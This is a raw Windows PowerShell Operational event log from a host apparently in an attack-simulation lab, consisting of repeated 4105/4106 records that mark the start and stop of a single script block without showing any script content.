ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471610
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471609
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471608
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471607
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471606
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471605
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471604
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471603
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471602
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471601
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471600
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471599
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471598
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471597
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471596
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471595
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471594
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471593
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471592
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471591
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471590
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471589
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471588
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471587
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471586
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471585
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471584
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471583
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471582
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471581
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471580
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471579
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471578
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471577
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471576
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471575
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471574
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471573
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471572
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471571
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471570
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471569
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471568
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471567
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471566
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471565
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471564
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471563
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471562
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471561
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471560
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471559
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471558
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471557
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471556
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
